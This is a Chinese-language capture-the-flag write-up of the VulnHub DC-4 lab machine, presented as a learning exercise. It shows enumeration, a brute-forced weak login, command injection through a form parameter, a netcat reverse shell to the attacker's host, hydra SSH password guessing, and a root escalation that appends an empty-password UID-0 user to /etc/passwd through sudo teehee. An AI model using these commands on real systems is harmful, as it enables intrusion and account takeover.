vulnhub-DC-4

信息收集

老规矩,nmap扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─# nmap -A -p1-65535 192.168.20.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 16:22 CST
Nmap scan report for 192.168.20.133
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:4B:72:9D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.61 ms 192.168.20.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.55 seconds

22端口80端口都开放,80端口中间件为nginx,此版本没漏洞

1
2
3
└─# searchsploit nginx 1.15.10       
Exploits: No Results
Shellcodes: No Results

访问网站是一个后台登录,sqlmap跑一下,发现不是SQL注入

1
sqlmap -r "1.txt"

扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─# dirsearch -u "http://192.168.20.133/"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                   
 (_||| _) (/_(_|| (_| )                                                                                                                                                            
                                                                                                                                                                                   
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/hshdgyq/Desktop/reports/http_192.168.20.133/__24-11-20_16-28-06.txt

Target: http://192.168.20.133/

[16:28:06] Starting:                                                                                                                                                               
[16:28:46] 302 -  704B  - /command.php  ->  index.php                       
[16:28:51] 301 -  170B  - /css  ->  http://192.168.20.133/css/              
[16:29:06] 301 -  170B  - /images  ->  http://192.168.20.133/images/        
[16:29:06] 403 -  556B  - /images/                                          
[16:29:07] 403 -   15B  - /index.pHp                                        
[16:29:14] 302 -  206B  - /login.php  ->  index.php                         
[16:29:15] 302 -  163B  - /logout.php  ->  index.php

弱密码爆破

没东西,试试弱密码(直接burp爆破一下),尝试后发现用户名为admin,密码为happy,登录

任意命令执行

有三个选项,抓包可以发现是直接进行了命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /command.php HTTP/1.1
Host: 192.168.20.133
Content-Length: 22
Cache-Control: max-age=0
Origin: http://192.168.20.133
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.20.133/command.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=s95fm6tchhvstuea32etfp44q4
Connection: close

radio=ls+-l&submit=Run

修改参数radio可以进行命令执行,我尝试写文件,发现无法写入,应该是权限不够,那就直接反弹shell

1
2
3
nc+-e+/bin/sh+192.168.20.129+1111

nc -lvnp 1111

拿到shell

SSH爆破

接下来就是提权,现在是www-data用户,尝试了sudo和suid,在suid中发现jim用户的可疑文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@dc-4:/usr/share/nginx/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh

查看jim用户目录和可以文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@dc-4:/usr/share/nginx/html$ cd /home/jim     
cd /home/jim
www-data@dc-4:/home/jim$ ls
ls
backups  mbox  test.sh
www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."

无法利用,但是有发现了一个备份目录backups

1
2
3
4
5
6
7
8
9
10
11
www-data@dc-4:/home/jim$ cd backups
cd backups
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou

有密码本,这很有可能就是jim的登录密码,利用hydra进行爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─# hydra -l jim -P ps.txt ssh://192.168.20.133
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-20 17:25:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.20.133:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 87 to do in 00:01h, 15 active
[22][ssh] host: 192.168.20.133   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-20 17:26:42

成功爆破出密码jibril04,登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─# ssh jim@192.168.20.133          
The authenticity of host '192.168.20.133 (192.168.20.133)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.20.133' (ED25519) to the list of known hosts.
jim@192.168.20.133's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ ls
backups  mbox  test.sh

说有邮件,看看邮件是什么

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
jim@dc-4:/var/mail$ cat www-data
cat: www-data: Permission denied
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

ok,又是一个用户,也可以测试一下jim有sudo没,当然是没有的,再登录Charles用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─# ssh charles@192.168.20.133      
charles@192.168.20.133's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
charles@dc-4:~$ ls
charles@dc-4:~$ ls
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

teehee提权

有sudo,是teehee提权,teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

1
echo "hshdgyq::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su hshdgyq就可以登录到hsdgyq用户,这个用户因为uid为0,所以也是root权限

1
2
3
charles@dc-4:~$ echo "hshdgyq::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
hshdgyq::0:0:::/bin/bash

这里发现直接切换还是要密码,我们返回到jim用户再切换就不要密码了

1
2
3
4
jim@dc-4:/var/mail$ su hshdgyq
root@dc-4:/var/mail# whoami
root

至此靶机攻克

总结

此靶机难度低,考点为弱密码、命令执行、teehee提权、ssh密码爆破